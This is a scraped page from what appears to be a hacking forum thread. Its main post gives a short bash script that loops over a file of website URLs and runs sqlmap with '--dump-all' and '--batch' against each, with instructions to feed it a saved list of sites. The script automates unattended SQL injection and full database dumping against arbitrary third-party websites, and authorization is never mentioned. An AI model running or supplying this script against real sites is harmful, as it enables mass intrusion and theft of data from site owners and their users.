25 October, 2019 - 04:01 AM
thx !!
This post is by a banned member (Marius123) - Unhide
25 October, 2019 - 11:45 PM
#sunjester / https://underwurld.club
#automating sqlmap if [ -z $1 ]; then echo "specify a file" exit fi while IFS='' read -r line || [[ -n "$line" ]]; do sqlmap -u $line --dump-all --answers="follow=Y" --batch done < "$1" 3. execute the shell script in your console with the name of the file with the list of websites you saved (This script will suppress all the questions and may take longer than a normal sqlmap scan.) |
Create an account or sign in to comment | ||
You need to be a member in order to leave a comment | ||
Create an account
Sign up for a new account in our community. It's easy!
|
or |
Sign in
Already have an account? Sign in here.
|